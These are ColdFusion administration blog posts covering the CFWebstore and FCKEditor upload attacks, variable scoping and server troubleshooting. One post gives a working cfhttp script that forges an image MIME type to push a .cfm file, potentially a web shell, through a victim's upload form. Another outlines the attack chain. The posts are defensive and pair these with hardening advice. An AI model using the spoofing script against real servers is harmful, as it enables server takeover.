Theme

Had to change the theme as I couldn’t stand that links in my posts were barely visible with the old theme.

Recent ColdFusion Vulnerabilities Follow-Up

For about three weeks now, ColdFusion servers have been under attack through one of two upload vulnerabilities: one in older versions of an application written in ColdFusion (CFWebstore), the other in the FCKEditor that ships with ColdFusion.  Both issues have fixes available and should be handled with the utmost priority.
FCKEditor
When Adobe initially shipped ColdFusion 8.0 it included FCKEditor, which was enabled when using <cftextarea richtext="true">.  In version 8.0, the built-in FCKEditor file manager and uploader were disabled.  Although there was a post about enabling them, most developers didn’t use these features much, preferring to handle file uploads separately.  However, when the 8.0.1 update was released, Adobe enabled file uploads by default on the FCKEditor instance.
It was determined that an attacker could call the upload files directly and, by spoofing the MIME type, get files onto the server that could lead to compromise of the Windows host.
To correct this, there are two fixes.  The first is simply to edit the config.cfm file under CFIDE\scripts\ajax\FCKeditor\editor\filemanager\connectors\cfm to disable uploads.  Also, Adobe released a security patch for this issue; it is a very high priority patch that should be applied to your servers.
CFWebstore
As I mentioned in my last post, users running older versions of CFWebstore could also be vulnerable, due to a few upload scripts that are accessible directly and are susceptible to MIME type spoofing.  It’s important to note that CFWebstore responded very quickly with a temporary fix to prevent access to the upload files.  They also released a more detailed description of exactly what was happening to servers, compiled from many users’ experiences described on their mailing list.
Staying on Top of Things
So how can you stay on top of this sort of issue in the future?  My first recommendation is to subscribe to as many ColdFusion related blogs as possible; at least start with the ColdFusionBloggers.org feed.  Second, join any forums or mailing lists related to the applications you are running.  Third, keep your software as up-to-date as possible: the longer a version is in the wild, the more likely someone with lots of time on their hands has found a way to exploit even the smallest hole and create a very large hassle for you.  Lastly, keep an eye on the SANS Internet Storm Center, which posts newly discovered vulnerabilities as they are learned of and patched; this covers everything from Apple products to web applications and Windows issues.
Additional Resources

 

CFWebstore File Upload Vulnerability

NOTE: Please read my follow-up to this and the recent FCKEditor issues affecting ColdFusion, also if you’re using TinyMCE with the TinyBrowser plugin read this post as well.
There has been a recent outbreak of attacks on servers running the ColdFusion shopping cart CFWebstore that allows the attackers to upload a ColdFusion variant of the C99 web shell. This gives them full access to your server; it will be compromised if they get that file up there.
Here’s what they do:

  1. Using the /customtags/uploadfile.cfm page, they are spoofing the MIME type to upload index.cfm and image.cfm to /images/accounts directory – these are their web shells (think of them like control panels).
  2. After having these web shells uploaded, things can go one of several ways:
    1. If you have cfexecute/cfregistry disabled, they will likely just inject JavaScript into every site on your server
    2. If you have cfexecute/cfregistry enabled, they will likely attack you with wminotify, this allows them to log and send back home all passwords used to log into the server for remote administration. At this point, you should probably plan to build a new server because this level of compromise is pretty deep and you likely won’t clean it all up.
    3. If you had cfexecute/cfregistry disabled and Sandbox security on each site, then only the CFWebstore site that was attacked will be injected with JavaScript.

So, you’ve been attacked and cleaned things up or rebuilt a server or two; what now? According to the folks at CFWebstore, you need to modify the application.cfm file for your store with the code from their blog. EDIT: More detailed information is available from CFWebstore. Use the link; I’m not posting the code here in case it changes. Also, I would suggest upgrading to the newest version as fast as your budget and resources allow: according to CFWebstore, as of version 6 certain upload files in the customtags directory are no longer used and have been removed from the code base.
Additional details about the attack:

  • The shell contains many references to seraph, this is likely his/their blog in China
  • It looks like one of seraph’s buddies, chanm is actually doing the attack as I’ve seen Windows users created with the name of chanm$.
  • More info about wminotify.dll from Symantec
  • Read through the comments on Ray Camden’s post about this issue which includes many details from various people’s experience with this attack
  • The attacker is sometimes uploading a JSP file to get around the security layer in ColdFusion, which allows complete bypass of any Sandboxes you already had setup

While this is a specific attack on one application, the lessons learned can be applied to any web application:

  • DO NOT blindly trust the MIME types that are sent by a browser, these are easily spoofed.
  • DO upload outside your web root initially
  • DO additional checks on uploaded files before pushing them live (file extensions should match, use functions like isImageFile() and isPDFFile() in ColdFusion, etc.)
  • DO protect uploads with some sort of login (assuming your business rules preclude the public uploading content to your site)
  • DO disable JSP handling in ColdFusion if you don’t use it, see Adobe instructions.

Edit: It’s been a long 2 weeks dealing with these; if I’ve missed something, let me know in the comments.
Last Update: 2 July 2009 12:40 PM

Spoofing MIME Types with ColdFusion and CFHTTP

Think your file uploads are secure? Think again. Using this very simple technique with ColdFusion installed locally, you can spoof the MIME type of any file and get it uploaded to another server, opening the door to any number of code exploits.
First, we’re going to write a quick file upload script:

<cfform name='upload' action='uploadact.cfm' enctype='multipart/form-data' method='post'>
<cfinput type='file'
name='FileUpload'
required='yes'
message='Select a file to upload.' /><br />
<cfinput
type='submit'
value='Upload File'
name='submit' />
</cfform>

Notice this form posts to an action page called uploadact.cfm, which only accepts JPEGs and GIFs.  The action page handles the upload as follows:

<cfif isDefined('form.fileUpload')>
    <cffile
        action='upload'
        fileField='fileUpload'
        destination='C:\path\to\upload'
        accept='image/jpeg,image/gif'
        nameconflict='makeunique'>
    <p>Thank you, your file has been uploaded.</p>
    <p><a href='/'>Return Home</a></p>
</cfif>

Now for the fun part: we’re going to write a page using cfhttp that would run on the attacker’s own server or workstation and uploads a file local to them by faking the MIME type with cfhttpparam:

<cfhttp
    url='http://example.com/uploadact.cfm'
    method='post'>
    <cfhttpparam
        type='formfield'
        value='Upload File'
        name='submit'>
    <cfhttpparam
        type='file'
        name='FileUpload'
        file='C:\Path\To\test.cfm'
        mimetype='image/jpeg'>
</cfhttp>

With this we could upload an ASP or ColdFusion based web shell that would essentially give unlimited access to a server.  So follow these tips:

  1. If you have an Enterprise license, use Sandbox Security.  This will limit each site to its own set of directories and data sources.
  2. Disable cfexecute and cfregistry.  If you can use Sandboxes, do this for each Sandbox, or set up a global Sandbox on your main site’s directory.  If you absolutely need cfexecute, remember that you can set up a Sandbox for a single folder with access to it and put your processing files there (say, to use FFmpeg for video conversion).
  3. Disable JSP (Adobe Instructions) if you don’t actually use it.  Since ColdFusion runs as System on Windows by default, any JSP file that makes its way onto the server will have full access, and JSPs don’t follow Sandboxes, so even if they are set up they are of no use against a JSP.
  4. Run ColdFusion as another user (Adobe Instructions).  Obviously, running ColdFusion as a less privileged user will prevent total control of your server should something malicious get uploaded.
  5. Always perform multiple checks on your file uploads (Pete Freitag has a good article on this)
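A hardened replacement for the uploadact.cfm page above that applies the DO/DO NOT list from the CFWebstore post and the tips just given. This is an added example, not code from the original post or from CFWebstore; it assumes the form field name FileUpload from the form above, a session.userId set by your own login code, and /images/accounts as the final directory.

```cfml
<!--- uploadact.cfm, hardened (added example; assumes form field FileUpload,
      session.userId set by your login code, and /images/accounts as target) --->
<cfif not structKeyExists(session, "userId")>
    <cfthrow message="Login required to upload files.">
</cfif>
<cfif not structKeyExists(form, "FileUpload")>
    <cfthrow message="No file was submitted.">
</cfif>

<!--- Step 1: land the file outside the web root. getTempDirectory() is the JVM
      temp directory; with Sandbox Security it needs read/write in the Sandbox. --->
<cffile action="upload"
        fileField="FileUpload"
        destination="#getTempDirectory()#"
        nameConflict="makeunique">
<cfset stagedPath = cffile.serverDirectory & "/" & cffile.serverFile>

<!--- cffile.contentType/contentSubType echo the browser-supplied MIME type, which
      is exactly what the cfhttp page above forges, so they are logged, never trusted. --->
<cflog file="uploads" type="information"
       text="#cffile.clientFile# declared as #cffile.contentType#/#cffile.contentSubType#">

<!--- Step 2: the extension must be on an allow-list AND the bytes must decode as
      an image (isImageFile). A script renamed to .jpg fails the second check. --->
<cfset allowedExt = "jpg,jpeg,gif">
<cfset extOk = listFindNoCase(allowedExt, cffile.serverFileExt) GT 0>

<cfif not extOk or not isImageFile(stagedPath)>
    <cffile action="delete" file="#stagedPath#">
    <cflog file="uploads" type="warning"
           text="rejected #cffile.clientFile# (ext=#cffile.serverFileExt#) from #cgi.remote_addr#">
    <p>Only JPEG and GIF images are accepted.</p>
<cfelse>
    <!--- Step 3: never reuse the client's file name; give the file a generated name
          with a known-safe extension before moving it under the web root. --->
    <cfset safeName = createUUID() & "." & lCase(cffile.serverFileExt)>
    <cffile action="move"
            source="#stagedPath#"
            destination="#expandPath('/images/accounts/')##safeName#">
    <p>Thank you, your file has been uploaded.</p>
</cfif>
```

The rename step guarantees nothing under the web root ever carries a .cfm, .asp or .jsp extension, whatever name the client sent, and the rejected uploads log gives you a line per attempt to watch for in the "uploads" log file.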

ColdFusion Variable Scopes

Understanding how ColdFusion handles variable scopes is essential to keeping both your application and server running smoothly and avoiding performance degradation.  Scoping your variables takes seconds at development time.  I frequently talk with customers who have ‘memory leaks’ and are quick to blame the application server; however, a ColdFusion server that isn’t running any code would not typically leak, which points back at the application code.
The Scopes
 
Order of Evaluation
Should you specify a variable name without a scope, ColdFusion has to search through the scopes in the order below to determine where it exists.  As you might imagine, on a very frequently requested page this can cause significant slow-downs and performance issues.

  1. Function local (only UDFs and CFCs)
  2. Thread local (only inside threads)
  3. Arguments
  4. Variables
  5. Thread
  6. CGI
  7. Cffile
  8. URL
  9. Form
  10. Cookie
  11. Client

A variable in any scope not on this list must be referenced with an explicit scope prefix to be accessed.
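Two constructed files, Cart.cfc and test.cfm, added here as an example (not from the original post) of both points above: the search order deciding which unscoped id wins, and a variable inside a CFC that was not declared with var leaking into the component’s Variables scope, which is the usual source of the ‘memory leak’ complaints. Cart.cfc and the test page are assumed to sit in the same directory.

```cfml
<!--- ===== Cart.cfc (constructed for this example) ===== --->
<cfcomponent output="false">
    <!--- BAD: total and i are not declared with var, so they land in the CFC's
          Variables scope. Cache this CFC in the application scope and every
          request shares, and races on, the same two variables. --->
    <cffunction name="totalUnscoped" access="public" returntype="numeric">
        <cfargument name="prices" type="array" required="true">
        <cfset total = 0>
        <cfloop from="1" to="#arrayLen(arguments.prices)#" index="i">
            <cfset total = total + arguments.prices[i]>
        </cfloop>
        <cfreturn total>
    </cffunction>

    <!--- GOOD: var makes both names function-local; nothing survives the call. --->
    <cffunction name="totalScoped" access="public" returntype="numeric">
        <cfargument name="prices" type="array" required="true">
        <cfset var total = 0>
        <cfset var i = 0>
        <cfloop from="1" to="#arrayLen(arguments.prices)#" index="i">
            <cfset total = total + arguments.prices[i]>
        </cfloop>
        <cfreturn total>
    </cffunction>

    <!--- Lets the caller see whether "total" leaked into the Variables scope. --->
    <cffunction name="leaked" access="public" returntype="boolean">
        <cfreturn structKeyExists(variables, "total")>
    </cffunction>
</cfcomponent>

<!--- ===== test.cfm (same directory) ===== --->
<!--- Search order: URL is checked before Form, so the unscoped id resolves to
      the URL value even though Form was set last. Always write the scope. --->
<cfset url.id = "from-url">
<cfset form.id = "from-form">
<cfset cart = createObject("component", "Cart")>
<cfset prices = [9.99, 5]>
<cfoutput>
    unscoped id = #id#, form.id = #form.id#<br>
    <!--- leaked() is NO after the var-scoped call ... --->
    scoped total = #cart.totalScoped(prices)#, leaked = #cart.leaked()#<br>
    <!--- ... and YES after the unscoped one: "total" now lives on in the CFC --->
    unscoped total = #cart.totalUnscoped(prices)#, leaked = #cart.leaked()#<br>
</cfoutput>
```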
Additional Reading

 

Jason Dean’s Security Series

Jason over at 12Robots.com has been writing a really great series of articles about secure application development for quite some time.  Since I haven’t seen them all in one index, I threw up links to all the articles on this page.

I’m pretty sure I got them all from Jason’s site, but if I missed any, just let me know in a comment.

ColdFusion Stops Serving After a Few Requests

Just had an issue where ColdFusion would only serve a few requests before locking up and returning constant 503 errors.  Turns out there were almost 200k files in C:\Coldfusion8\runtime\servers\coldfusion\SERVER-INF\temp\wwwroot-tmp.  So, to fix this I stopped ColdFusion, renamed wwwroot-tmp to wwwroot-tmp2 and made a new wwwroot-tmp.  Once ColdFusion was started it ran like a champ again.  My theory is the disk I/O was killing CF when it was looking for a cached file.

cfimage CAPTCHA Timer already cancelled

I’ve been running into this error more often lately.  Customers using cfimage to create a captcha image will sometimes get the following error when creating the image:

java.lang.IllegalStateException: Timer already cancelled.

It appears this is related to Java not having enough memory to create an image while ColdFusion still has enough to run and serve pages, which means you have to restart ColdFusion at that point.
Anyone else run into this, or know of a way to prevent it?
 

ColdFusion Verity – Unable to create temporary file

While working on a ticket today, I came across an interesting error message while trying to index or refresh a Verity collection.

Unable to create temporary file 
java.lang.SecurityException: Unable to create temporary file
	at java.io.File.checkAndCreate(File.java:1701)
	at java.io.File.createTempFile(File.java:1793)
	at coldfusion.tagext.search.IndexTag.doQueryUpdate(IndexTag.java:702)
	at coldfusion.tagext.search.IndexTag.doStartTag(IndexTag.java:160)
	at coldfusion.runtime.CfJspPage._emptyTcfTag(CfJspPage.java:2661)
	at cfindexverity2ecfm902179424.runPage(C:Websites41334eaeindexverity.cfm:32)
	at coldfusion.runtime.CfJspPage.invoke(CfJspPage.java:196)
	at coldfusion.tagext.lang.IncludeTag.doStartTag(IncludeTag.java:370)
	at coldfusion.runtime.CfJspPage._emptyTcfTag(CfJspPage.java:2661)
	at cfApplication2ecfc1112783929$funcONREQUEST.runFunction(C:Websites41334eaeApplication.cfc:205)
	at coldfusion.runtime.UDFMethod.invoke(UDFMethod.java:418)
	at coldfusion.runtime.UDFMethod$ReturnTypeFilter.invoke(UDFMethod.java:360)
	at coldfusion.runtime.UDFMethod$ArgumentCollectionFilter.invoke(UDFMethod.java:324)
	at coldfusion.filter.FunctionAccessFilter.invoke(FunctionAccessFilter.java:59)
	at coldfusion.runtime.UDFMethod.runFilterChain(UDFMethod.java:277)
	at coldfusion.runtime.UDFMethod.invoke(UDFMethod.java:192)
	at coldfusion.runtime.TemplateProxy.invoke(TemplateProxy.java:448)
	at coldfusion.runtime.TemplateProxy.invoke(TemplateProxy.java:308)
	at coldfusion.runtime.AppEventInvoker.invoke(AppEventInvoker.java:74)
	at coldfusion.runtime.AppEventInvoker.onRequest(AppEventInvoker.java:243)
	at coldfusion.filter.ApplicationFilter.invoke(ApplicationFilter.java:269)
	at coldfusion.filter.RequestMonitorFilter.invoke(RequestMonitorFilter.java:48)
	at coldfusion.filter.MonitoringFilter.invoke(MonitoringFilter.java:40)
	at coldfusion.filter.PathFilter.invoke(PathFilter.java:86)
	at coldfusion.filter.ExceptionFilter.invoke(ExceptionFilter.java:70)
	at coldfusion.filter.ClientScopePersistenceFilter.invoke(ClientScopePersistenceFilter.java:28)
	at coldfusion.filter.BrowserFilter.invoke(BrowserFilter.java:38)
	at coldfusion.filter.NoCacheFilter.invoke(NoCacheFilter.java:46)
	at coldfusion.filter.GlobalsFilter.invoke(GlobalsFilter.java:38)
	at coldfusion.filter.DatasourceFilter.invoke(DatasourceFilter.java:22)
	at coldfusion.CfmServlet.service(CfmServlet.java:175)
	at coldfusion.bootstrap.BootstrapServlet.service(BootstrapServlet.java:89)
	at jrun.servlet.FilterChain.doFilter(FilterChain.java:86)
	at coldfusion.monitor.event.MonitoringServletFilter.doFilter(MonitoringServletFilter.java:42)
	at coldfusion.bootstrap.BootstrapFilter.doFilter(BootstrapFilter.java:46)
	at jrun.servlet.FilterChain.doFilter(FilterChain.java:94)
	at com.seefusion.Filter.doFilter(Filter.java:49)
	at com.seefusion.SeeFusion.doFilter(SeeFusion.java:1471)
	at jrun.servlet.FilterChain.doFilter(FilterChain.java:94)
	at jrun.servlet.FilterChain.service(FilterChain.java:101)
	at jrun.servlet.ServletInvoker.invoke(ServletInvoker.java:106)
	at jrun.servlet.JRunInvokerChain.invokeNext(JRunInvokerChain.java:42)
	at jrun.servlet.JRunRequestDispatcher.invoke(JRunRequestDispatcher.java:286)
	at jrun.servlet.ServletEngineService.dispatch(ServletEngineService.java:543)
	at jrun.servlet.jrpp.JRunProxyService.invokeRunnable(JRunProxyService.java:203)
	at jrunx.scheduler.ThreadPool$DownstreamMetrics.invokeRunnable(ThreadPool.java:320)
	at jrunx.scheduler.ThreadPool$ThreadThrottle.invokeRunnable(ThreadPool.java:428)
	at jrunx.scheduler.ThreadPool$UpstreamMetrics.invokeRunnable(ThreadPool.java:266)
	at jrunx.scheduler.WorkerThread.run(WorkerThread.java:66) 

Turns out that if you are using Sandbox Security you’ll need to add the directory returned by the GetTempDirectory() function to your Sandbox with read and write permissions, and it will start working again.

cfimage CAPTCHA Not Displaying

You may occasionally run into a problem with ColdFusion and IIS where CAPTCHA images created by cfimage are simply blank and look like they don’t exist.  Assuming you don’t have a corrupt installation, the following steps will fix this.

  1. Open IIS
  2. Expand the server you’re working with by clicking the plus sign and go to the properties for “Web Sites”
  3. In the Home Directory tab click on “Configuration”
  4. You should now be on the “Application Configuration” screen, select the Wildcard Mapping at the bottom which goes to cfroot/runtime/lib/wsconfig/1/jrun_iis6_wildcard.dll and hit Edit
  5. Make sure “Verify that file exists” is unchecked and hit OK until you’re back in the IIS Manager.

This should correct any issues you had with cfimage and many other tags that also create things “on the fly” in ColdFusion.